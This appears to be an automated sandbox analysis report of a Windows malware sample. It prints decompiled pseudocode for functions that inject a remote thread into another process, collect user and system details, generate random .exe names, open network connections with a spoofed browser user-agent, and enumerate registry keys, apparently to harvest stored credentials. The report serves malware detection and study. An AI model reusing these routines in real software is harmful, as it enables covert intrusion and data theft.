0x0040c12c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c11a
0x0040c0eb
0x0040c0eb
0x0040c0ed
0x0040c0ed
0x0040c0ed
0x0040c0e9
0x0040c0da
0x0040c13f

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,004136D2,?,?,00000000), ref: 0040C0BF
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,004136D2,?,?,00000000), ref: 0040C0D2
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,004136D2,?,?,00000000), ref: 0040C0FA
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,004136D2,?,?,00000000), ref: 0040C112
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,004136D2,?,?,00000000), ref: 0040C12C
CloseHandle.KERNEL32(?,?,?,?,?,004136D2,?,?,00000000), ref: 0040C135

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: 05cfcad8ec1c1237e72fae49f687263ac3a735d7e25788011c1d4679afa2a1af
Instruction ID: 151662195e7641df871818221c66febb6267d545c45ce423d8321bec0c32c005
Opcode Fuzzy Hash: 05cfcad8ec1c1237e72fae49f687263ac3a735d7e25788011c1d4679afa2a1af
Instruction Fuzzy Hash: 54119075100200FFDB219F21CD89EAB7BE8EB55700F10462DF596E61A1D330A981CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040568F, Relevance: 9.1, APIs: 6, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040568F(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x423968 & 0x00000004) == 0 || E00412FEE() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x4231bc);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

0x0040569a
0x0040569e
0x00405710
0x00000000
0x004056a9
0x004056b5
0x004056b9
0x00000000
0x004056c0
0x004056cf
0x004056d9
0x004056df
0x004056ef
0x004056f7
0x004056fe
0x00405701
0x00405707
0x0040570a
0x0040570d
0x00000000
0x0040570d
0x004056b9

APIs

GetUpdateRgn.USER32 ref: 00405717

Part of subcall function 00412FEE: WaitForSingleObject.KERNEL32(00000000,004141F7,743C152E,00000002), ref: 00412FF6

TlsGetValue.KERNEL32 ref: 004056AF
SetRectRgn.GDI32(?,?,?,?,?), ref: 004056CF
SaveDC.GDI32(?), ref: 004056DF
SendMessageW.USER32(?,00000014,?,00000000), ref: 004056EF
RestoreDC.GDI32(?,00000000), ref: 00405701

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: 1219a6502d0d05a5151383bc0b64907565123d2d55f7d65cebd23832a32be42d
Instruction ID: 53c7e8738a14773c49e775ba264bbb356a528ed9f3544e25e8c355f4ad31de9e
Opcode Fuzzy Hash: 1219a6502d0d05a5151383bc0b64907565123d2d55f7d65cebd23832a32be42d
Instruction Fuzzy Hash: AB115E31000741EBDB325F65ED48F977BB5FB44711F044829FA86A25B1C376A4A1EF68

Uniqueness

Uniqueness Score: -1.00%

Function 00405F04, Relevance: 9.1, APIs: 6, Instructions: 54
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00405F04(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E00412F03(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
					if(_t26 != 0) {
						_t14 = CreateRemoteThread(_t23, 0, 0, _t10 -  *0x42397c + E004136A2, 0, 0, 0);
						_a4 = _t14;
						if(_t14 == 0) {
							VirtualFreeEx(_t23, _t26, 0, 0x8000);
						} else {
							WaitForSingleObject(_t14, 0x2710);
							CloseHandle(_a4);
							_v5 = 1;
						}
					}
					CloseHandle(_t23);
				}
				return _v5;
			}

0x00405f04
0x00405f07
0x00405f15
0x00405f1e
0x00405f20
0x00405f22
0x00405f24
0x00405f29
0x00405f2e
0x00405f32
0x00405f46
0x00405f4c
0x00405f51
0x00405f76
0x00405f53
0x00405f59
0x00405f62
0x00405f68
0x00405f68
0x00405f51
0x00405f7d
0x00405f83
0x00405f8a

APIs

OpenProcess.KERNEL32(0000047A,00000000,74B5F560,00000000,74B5F560,?,?,004060BC,?,?,00000000,?,74B5F560,00000000), ref: 00405F18
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-0083701E,00000000,00000000,00000000), ref: 00405F46
WaitForSingleObject.KERNEL32(00000000,00002710,?,004060BC,?,?,00000000,?,74B5F560,00000000), ref: 00405F59
CloseHandle.KERNEL32(74B5F560,?,004060BC,?,?,00000000,?,74B5F560,00000000), ref: 00405F62
VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,004060BC,?,?,00000000,?,74B5F560,00000000), ref: 00405F76
CloseHandle.KERNEL32(00000000,?,00000000,?,?,004060BC,?,?,00000000,?,74B5F560,00000000), ref: 00405F7D

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$CreateFreeObjectOpenProcessRemoteSingleThreadVirtualWait
String ID:
API String ID: 14861764-0
Opcode ID: 0b143925859ab585576211d55fbaf1db165d8ede8ecb4e6919481f870966e8e2
Instruction ID: d0e000c651090204909094b0d560fe96ffc13946eb319b963085ff98b325462e
Opcode Fuzzy Hash: 0b143925859ab585576211d55fbaf1db165d8ede8ecb4e6919481f870966e8e2
Instruction Fuzzy Hash: DE019EB2104149BFEB102B649D88EBF3E6CDB49394B0440B9FA01F6160C7794C458A79

Uniqueness

Uniqueness Score: -1.00%

Function 0040E2A5, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E0040E2A5(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t114 =  *_t111;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E0040C766(_t114);
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if((_a8 & 0x00000001) == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x7070707;
						_t99 = E0040C77A(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E00406E85( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E0040E1F1(_t106, _t111, 2);
									E0040E1F1(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 != 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E0040C827(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_t64 =  &_v588;
								__imp__GetUserNameExW(2, _t64,  &_a4);
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 != 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E0040C827(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E00413BC3(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E0040C77A(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E0040C77A(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00406F87();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E0040C77A(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00406FAF();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E0040C77A(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t104 = 4;
					_t99 = E0040C77A(_t111, _t104);
					goto L16;
				}
				_t92 = E00413194(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E0040C827(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E004132F4( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E0040C827(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}

0x0040e2a5
0x0040e2a5
0x0040e2b0
0x0040e2b3
0x0040e2b7
0x0040e2b9
0x0040e2bd
0x0040e2bf
0x0040e2c4
0x0040e2c8
0x00000000
0x0040e2ca
0x0040e2d1
0x0040e2d1
0x0040e2d5
0x0040e2de
0x0040e327
0x0040e327
0x0040e32b
0x0040e330
0x0040e331
0x0040e332
0x0040e339
0x0040e33c
0x0040e348
0x0040e348
0x0040e34a
0x0040e34a
0x0040e34e
0x0040e3c3
0x0040e3c3
0x0040e3c5
0x0040e4c8
0x0040e4c8
0x0040e4cc
0x0040e4d0
0x0040e4d5
0x0040e4d5
0x0040e4d5
0x0040e4d8
0x00000000
0x0040e4d8
0x0040e3cb
0x0040e3cf
0x0040e41d
0x0040e41d
0x0040e41f
0x00000000
0x00000000
0x0040e425
0x0040e429
0x0040e4a9
0x0040e4a9
0x0040e4ab
0x00000000
0x00000000
0x0040e4ad
0x0040e4b1
0x0040e4b6
0x0040e4be
0x0040e4be
0x00000000
0x0040e4b1
0x0040e439
0x0040e43f
0x0040e442
0x0040e444
0x0040e446
0x0040e44d
0x0040e456
0x0040e461
0x0040e461
0x0040e463
0x0040e46a
0x0040e46c
0x00000000
0x0040e46e
0x0040e472
0x0040e47b
0x0040e481
0x0040e483
0x0040e485
0x0040e488
0x0040e48a
0x0040e48c
0x0040e493
0x0040e49c
0x0040e4a7
0x0040e4a7
0x0040e48a
0x00000000
0x0040e483
0x0040e46c
0x0040e3d1
0x0040e3d4
0x0040e3db
0x0040e3df
0x0040e3e0
0x0040e3e7
0x0040e3e8
0x0040e3ed
0x0040e3ef
0x0040e3f1
0x0040e4c5
0x00000000
0x0040e4c5
0x0040e3f7
0x0040e400
0x0040e406
0x0040e40a
0x0040e40b
0x0040e412
0x0040e413
0x0040e418
0x0040e41b
0x00000000
0x0040e41b
0x0040e350
0x0040e352
0x00000000
0x00000000
0x0040e35d
0x0040e363
0x0040e364
0x0040e365
0x0040e36c
0x0040e374
0x0040e376
0x0040e378
0x00000000
0x00000000
0x0040e383
0x0040e389
0x0040e38a
0x0040e38b
0x0040e392
0x0040e39a
0x0040e39c
0x0040e39e
0x00000000
0x00000000
0x0040e3aa
0x0040e3b0
0x0040e3b1
0x0040e3b2
0x0040e3b9
0x0040e3c1
0x00000000
0x0040e3c1
0x0040e2e7
0x0040e2f2
0x0040e2fd
0x0040e2ff
0x0040e301
0x00000000
0x00000000
0x0040e307
0x0040e30c
0x0040e311
0x0040e319
0x0040e321
0x0040e321
0x0040e323
0x0040e325
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040E3A4
GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,?,00000000), ref: 0040E3F7
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,?,00000000), ref: 0040E439
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 0040E47B

Strings

, xrefs: 0040E4AD

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser$CountDefaultFileLanguageModuleTick
String ID:
API String ID: 2256650695-3916222277
Opcode ID: 8b80994f005356376355924ee7c7275a1c01e26cad5073e53c9f5c9bbcbf5aa7
Instruction ID: 907b05b41f2661ed186bc4ee48ae5d99746dc38833a45aa7af620ac9e0b244b0
Opcode Fuzzy Hash: 8b80994f005356376355924ee7c7275a1c01e26cad5073e53c9f5c9bbcbf5aa7
Instruction Fuzzy Hash: DE51FA7168024879E710AB66D849FDE3BA89F02314F08457BFD48BF2D2D77C9A54CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B204, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B204(signed int __eax, signed int __ecx, void* __eflags, signed int _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				signed int _t56;
				WCHAR* _t57;
				short* _t59;
				signed short _t71;
				char* _t77;
				signed int _t84;
				signed short* _t85;
				signed int _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = E0040820A(__eax & 0x000000ff, __ecx & 0x000000ff);
				_v16 = _t87;
				_t56 = E004081BE();
				_t77 = "bcdfghklmnpqrstvwxz";
				if((_t56 & 0x00000100) == 0) {
					_v32 = "aeiouy";
					_v28 = _t77;
				} else {
					_v32 = _t77;
					_v28 = "aeiouy";
				}
				_t84 = 0;
				_v12 = 0;
				_v8 = 0;
				if(_t87 > 0) {
					_v20 = _a4 & 0x00000004;
					do {
						if(_v8 == 2) {
							if((E004081BE() & 0x00000100) == 0) {
								_v32 = "aeiouy";
								_v28 = _t77;
							} else {
								_v32 = _t77;
								_v28 = "aeiouy";
							}
							_v8 = _v8 & 0x00000000;
						}
						_t88 =  *((intOrPtr*)(_t89 + _v8 * 4 - 0x1c));
						_v24 = ((0 | _t88 != _t77) - 0x00000001 & 0x0000000d) + 6;
						if(_v20 == 0 || _t84 - _v12 <= 1 || (E004081BE() & 0x00000101) != 0x101) {
							_t71 =  *((char*)(E0040820A(_v24 - 1, 0) + _t88));
						} else {
							_t71 = 0x20;
							_v12 = _t84;
						}
						_a8[_t84] = _t71;
						_t84 = _t84 + 1;
						_v8 = _v8 + 1;
					} while (_t84 < _v16);
					_t87 = _v16;
				}
				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
					_t85 = _a8;
				} else {
					_t85 = _a8;
					_t59 = _t85 + _t87 * 2 - 2;
					while( *_t59 == 0x20) {
						_t59 = _t59 - 2;
						_t87 = _t87 - 1;
						if(_t87 != 0) {
							continue;
						} else {
						}
						goto L24;
					}
				}
				L24:
				_t57 = 0;
				_t85[_t87] = 0;
				if((_a4 & 0x00000002) != 0) {
					_t57 = CharUpperW( *_t85 & 0x0000ffff);
					 *_t85 = 0;
				}
				return _t57;
			}

0x0040b219
0x0040b21b
0x0040b21e
0x0040b223
0x0040b22d
0x0040b23b
0x0040b242
0x0040b22f
0x0040b22f
0x0040b232
0x0040b232
0x0040b245
0x0040b247
0x0040b24a
0x0040b24f
0x0040b25b
0x0040b25e
0x0040b262
0x0040b26e
0x0040b27c
0x0040b283
0x0040b270
0x0040b270
0x0040b273
0x0040b273
0x0040b286
0x0040b286
0x0040b28d
0x0040b2a3
0x0040b2a6
0x0040b2d7
0x0040b2c4
0x0040b2c6
0x0040b2c7
0x0040b2c7
0x0040b2df
0x0040b2e3
0x0040b2e4
0x0040b2e7
0x0040b2f0
0x0040b2f0
0x0040b2f7
0x0040b312
0x0040b2fd
0x0040b2fd
0x0040b300
0x0040b304
0x0040b30a
0x0040b30d
0x0040b30e
0x00000000
0x00000000
0x0040b310
0x00000000
0x0040b30e
0x0040b304
0x0040b315
0x0040b315
0x0040b31b
0x0040b31f
0x0040b325
0x0040b32b
0x0040b32b
0x0040b332

APIs

Part of subcall function 004081BE: GetTickCount.KERNEL32 ref: 004081BE

CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0040B325

Strings

aeiouy, xrefs: 0040B232, 0040B23B, 0040B273, 0040B27C
bcdfghklmnpqrstvwxz, xrefs: 0040B223
.exe, xrefs: 0040B20F
TE@, xrefs: 0040B28D

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CharCountTickUpper
String ID: .exe$TE@$aeiouy$bcdfghklmnpqrstvwxz
API String ID: 2674899715-2794143064
Opcode ID: 3bd7bb51b169408c925792aa529354ae0cdc0e9252f4b2617dd42aac321b09ce
Instruction ID: 07dc0da1f6772eca4de8e2b26585d6cc587e1659e31f625147f11a18a0492f52
Opcode Fuzzy Hash: 3bd7bb51b169408c925792aa529354ae0cdc0e9252f4b2617dd42aac321b09ce
Instruction Fuzzy Hash: 9F317E71D00219ABCB10AF99C5492BEBBB4FF84304F2480BBD951BB381D7789A458BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00408A59, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
networkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408A59(signed int __eax, char* __ecx) {
				short _v28;
				char* _v32;
				signed int _t5;
				void* _t12;
				void* _t14;
				char* _t15;
				void* _t18;

				_t15 = __ecx;
				_t5 = __eax;
				if(__ecx == 0) {
					_t15 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)";
				}
				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
				if(_t14 == 0) {
					L7:
					return 0;
				}
				_t18 = 0;
				do {
					_t1 = _t18 + 0x42200c; // 0x42200c
					_t2 = _t18 + 0x422008; // 0x2
					InternetSetOptionA(_t14,  *_t2, _t1, 4);
					_t18 = _t18 + 8;
				} while (_t18 < 0x18);
				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
				if(_t12 == 0) {
					InternetCloseHandle(_t14);
					goto L7;
				}
				return _t12;
			}

0x00408a59
0x00408a59
0x00408a5f
0x00408a61
0x00408a61
0x00408a76
0x00408a7a
0x00408abe
0x00000000
0x00408abe
0x00408a7d
0x00408a7f
0x00408a81
0x00408a88
0x00408a8f
0x00408a95
0x00408a98
0x00408aac
0x00408ab5
0x00408ab8
0x00000000
0x00408ab8
0x00408ac2

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00408A70
InternetSetOptionA.WININET(00000000,00000002,0042200C,00000004), ref: 00408A8F
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00408AAC
InternetCloseHandle.WININET(00000000), ref: 00408AB8

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00408A61, 00408A6F

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseConnectHandleOpenOption
String ID: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)
API String ID: 910987326-3737944857
Opcode ID: 5aefe19d0bb32e9cbeb8b693221f9016185c1d2ab1fa0afa268bba74750c75a0
Instruction ID: ecf7a95223baafc7fa3ef10421a8b69485df1f480f989e86a2e7ed047b97c706
Opcode Fuzzy Hash: 5aefe19d0bb32e9cbeb8b693221f9016185c1d2ab1fa0afa268bba74750c75a0
Instruction Fuzzy Hash: 93F090723006007EE62157B19ECCDAB7AAEEBC9B51B04043EF696F1171CA358954DB78

Uniqueness

Uniqueness Score: -1.00%

Function 00408ECD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00408ECD() {
				char _v8;
				struct HINSTANCE__* _v12;
				void* _v1036;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t15;
				char _t22;
				void* _t28;

				_t22 = 0;
				_t13 = LoadLibraryA("urlmon.dll");
				_v12 = _t13;
				if(_t13 != 0) {
					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
					if(_t15 != 0) {
						_push( &_v8);
						_push( &_v1036);
						_push(0);
						_v8 = 0x3ff;
						_v1036 = 0;
						if( *_t15() == 0) {
							if(_v8 > 0x3ff) {
								_v8 = 0x3ff;
							}
							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
							_t22 = E004072E3( &_v1036 | 0xffffffff,  &_v1036);
						}
					}
					FreeLibrary(_v12);
				}
				return _t22;
			}

0x00408edc
0x00408ede
0x00408ee4
0x00408ee9
0x00408ef1
0x00408ef9
0x00408eff
0x00408f06
0x00408f0c
0x00408f0d
0x00408f10
0x00408f1a
0x00408f1f
0x00408f21
0x00408f21
0x00408f27
0x00408f3d
0x00408f3d
0x00408f3f
0x00408f43
0x00408f43
0x00408f4d

APIs

LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00408EDE
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00408EF1
FreeLibrary.KERNEL32(?), ref: 00408F43

Strings

ObtainUserAgentString, xrefs: 00408EEB
urlmon.dll, xrefs: 00408ED7

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: ObtainUserAgentString$urlmon.dll
API String ID: 145871493-2685262326
Opcode ID: 616815c3e9121ffbf343b8d9e5611115b815e3e077c504ae8231f3eabdef1484
Instruction ID: 10d331c377c60e76e4e430cab6511ee98c32b5cf3d84bfe40173934adb45765b
Opcode Fuzzy Hash: 616815c3e9121ffbf343b8d9e5611115b815e3e077c504ae8231f3eabdef1484
Instruction Fuzzy Hash: 680184B1D04219ABCB50EBF89E8459E7BB8AB04300F2001BEB755F3290DA748E448B68

Uniqueness

Uniqueness Score: -1.00%

Function 00418DA5, Relevance: 7.7, APIs: 5, Instructions: 202
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00418DA5(char* __ecx, void* __eflags) {
				int _v8;
				void* _v12;
				signed int _v16;
				char* _v20;
				intOrPtr _v24;
				int _v28;
				intOrPtr _v32;
				char _v36;
				void* _v40;
				intOrPtr _v44;
				char* _v48;
				char _v60;
				char _v80;
				char _v100;
				char _v120;
				char _v152;
				char _v216;
				char _v284;
				short _v804;
				void* __edi;
				void* __esi;
				intOrPtr _t70;
				int _t102;
				int _t110;
				int _t114;
				void* _t115;
				signed int _t117;
				void* _t119;
				intOrPtr _t121;
				void* _t124;
				intOrPtr _t127;
				int _t134;
				intOrPtr _t136;
				char* _t138;
				char* _t141;
				signed int _t145;
				void* _t146;
				void* _t147;

				_t129 = __ecx;
				_t70 = E00406E55(0xc08);
				_t127 = _t70;
				_t134 = 0;
				_v24 = _t127;
				if(_t127 == 0) {
					return _t70;
				} else {
					E00405B00(0x83,  &_v216);
					_t141 =  &_v284;
					E00405B00(0x84, _t141);
					_v48 =  &_v216;
					_v44 = _t141;
					E00406F38( &_v36,  &_v36, 0, 8);
					E00405B00(0x85,  &_v120);
					E00405B00(0x86,  &_v100);
					E00405B00(0x87,  &_v60);
					_t145 =  &_v80;
					E00405B00(0x88, _t145);
					_t12 = _t127 + 0x3fc; // 0x3fc
					_v20 = _t12;
					_v16 = 0;
					do {
						if(RegOpenKeyExW(0x80000001,  *(_t146 + _v16 * 4 - 0x2c), _t134, 8,  &_v12) != 0) {
							goto L22;
						}
						_v28 = _t134;
						_v8 = 0x104;
						if(RegEnumKeyExW(_v12, _t134,  &_v804,  &_v8, _t134, _t134, _t134, _t134) != 0) {
							L21:
							RegCloseKey(_v12);
							goto L22;
						} else {
							goto L4;
						}
						do {
							L4:
							_t136 = _v24;
							_v28 = _v28 + 1;
							_t102 = E0040AFA9(_v12, _t129, _t136,  &_v804,  &_v120, 0xff);
							_t145 = _t145 | 0xffffffff;
							_v8 = _t102;
							if(_t102 != _t145 && _t102 != 0) {
								_t137 = _t136 + 0x1fe;
								_t110 = E0040AFA9(_v12, _t129, _t136 + 0x1fe,  &_v804,  &_v100, 0xff);
								_v8 = _t110;
								if(_t110 == _t145 || _t110 == 0) {
									_t114 = E0040AFA9(_v12, _t129, _t137,  &_v804,  &_v60, 0xff);
									_v8 = _t114;
									if(_t114 == _t145 || _t114 == 0) {
										goto L19;
									} else {
										goto L10;
									}
								} else {
									L10:
									_t115 = _v12;
									_t129 =  &_v804;
									_v40 = _t115;
									if(RegOpenKeyExW(_t115,  &_v804, 0, 1,  &_v40) != 0) {
										_t117 = _t145;
									} else {
										_t145 =  &_v40;
										_t117 = E0040B0D1(_t145,  &_v80, _t116, _v20, 0xff);
									}
									_v8 = _t117;
									if(_t117 != 0xffffffff && _t117 != 0) {
										_t138 = _v20;
										if(E00418D4B(_t138) > 0) {
											_t145 =  &_v152;
											_t119 = 0x56;
											E00405B00(_t119, _t145);
											_t121 = _v24;
											_push(_t121);
											_t129 = _t138;
											_push(_t129);
											_push(_t121 + 0x1fe);
											_t51 = _t129 + 0x1fe; // 0x1fe
											_t124 = E00407B78(_t145, 0x307, _t51, _t145);
											_t147 = _t147 + 0x10;
											if(_t124 > 0) {
												_t129 =  &_v36;
												if(E00407279(_t124,  &_v36, _v20 + 0x1fe) != 0) {
													_v32 = _v32 + 1;
												}
											}
										}
									}
									goto L19;
								}
							}
							L19:
							_v8 = 0x104;
